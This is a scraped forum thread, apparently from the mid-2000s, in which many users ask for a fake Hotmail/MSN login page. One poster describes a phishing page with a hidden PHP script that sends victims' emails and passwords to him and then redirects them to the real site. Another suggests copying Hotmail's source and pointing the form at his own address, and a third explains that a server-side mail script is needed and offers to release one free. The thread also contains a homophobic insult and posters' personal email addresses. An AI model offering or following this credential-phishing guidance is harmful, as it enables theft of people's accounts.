cactus
Closed Thread
Page 2 of 6 FirstFirst 1234 ... LastLast

Thread: Fake msn login page

Hybrid View

heddddddddddddd

Hi carlo

Quote Originally Posted by carlo
    Yes ive found a website where to get a fake hotmail login page. Just private message me and ill send it you by email

Hello carlo can you send me the website where i can find the gake msn shit plz

[email]doob_nl@hotmail.com[/email] this is my email thanks

Yes ive found a website where to get a fake hotmail login page. Just private message me and ill send it you by email
    can u send me the page please. my email is [email]free4singing@hotmail.com[/email]
    thanks again

Quote Originally Posted by RoLiNdAdIcE64
    can u send me the page please. my email is [email]free4singing@hotmail.com[/email]
    thanks again
    Come on people, LISTEN TO ME. Ok, I will have to resort to childish insults to prevent further posts...

Anyone who posts below this line (or on next page) is gay.

==============================================================================================
    Who needs drugs when you have electrons?

please send me the url where i can geht the fake hotmail login page to my email

please send me the url where i can get the fake hotmail login page to
    [email]hendrikuskwan@**********[/email]

thank you

hahahhaa... Nice dude, all you would have to do is copy and paste the source code... and d/l any images if you need to. You sneaky little devil you. Just copy and paste hotmails source code and then change the form in the input and password box by putting <form action="mailto:blabla@whatever.com"> (I don't know the actual HTML tag but it's something along those lines)

Quote Originally Posted by Hughesy**86
    Ok ive been reading all these noobs on here claiming to know what they are talking about, for one no matter what source code you have you need a form mail script to process the data, now i have made one and i have made a hotmail login page, which looks and acts the same as the one on [url]www.hotmail.com[/url], please note to all I AM NOT SAYING ITS GOOD TO HACK PEOPLES PASSES i am just wanting to help people learn about the web and this is a good example.

Heres what i made

[url]http://www.imagehosted.co.uk/hotmail[/url]

go there and login u will see that it works perfect just like msn does, but the trick is i am being sent the persons email and pass secretly, now to do this i have made a php script which hides in the background and sends me the data and then takes them to the official hotmail page and all they think is they have logged in wrong. Now this script took me a while so if you want this from me you can buy it for $* contact me at [email]admin@imagehosted.co.uk[/email] for details.
    No, you are not going to profit from something that is so SIMPLE to do. I even released a custom myspace fake login page, and will do the same for hotmail if you continue to ask people to pay you for it.

hahahhaa... Nice dude, all you would have to do is copy and paste the source code... and d/l any images if you need to. You sneaky little devil you. Just copy and paste hotmails source code
    PHP == server scripting language. There is no way you can download a php script. Sure you can download [x]html/css/javascript code (as it is a browser scripting language), but php scripts never reach you in your browser, and are processed by the server and not allowed to be downloaded.

and then change the form in the input and password box by putting <form action="mailto:blabla@whatever.com"> (I don't know the actual HTML tag but it's something along those lines)
    Html does not have email sending capabilities; and putting in a mailto: will just open up the user's email client with the recipient set to the 'hacker's' email address. A php (or asp, jsp, etc) script would be required to process the form and send mail. So basically, you can't get php sources (without some sort of exploit), and you can't send mail with html alone.

And my original comment remains the same - if this guy plans on profiting from selling hotmail fake pages, I will release one for free.
    Who needs drugs when you have electrons?

Your pm is full

please

can somebody please send me this script ?

Hey, when you click "Generate" on hotmail gen where are the files generated?!

hey! can u please send me a fake login page too? to [email]basho_gym@hotmail.com[/email] i wanna put it in my website , i realy need it thank you!!!
    Last edited by havalio; 10-13-2006 at 01:01 AM.

U can send me what's the website where r u get a fake hotmail, my e-mail is [email]turkito_85@hotmail.com[/email] thanks

hotmail

Pm Me And I Will Giveu The Fake Hotmail Login Page I Would Have Post It In This Message But It Was Too Long

can u pls send me a fake login page of Hotmail..Thanx so much in Advance
    [email]g_man_6666@hotmail.com[/email]

Quote Originally Posted by carlo View Post
    I need MSN Fake Login Page. So PLz send me now. My email address is

[email]why_people_deceive_tohers@**********[/email]

I hope that u will send it soon

With thanx in advance

Closed Thread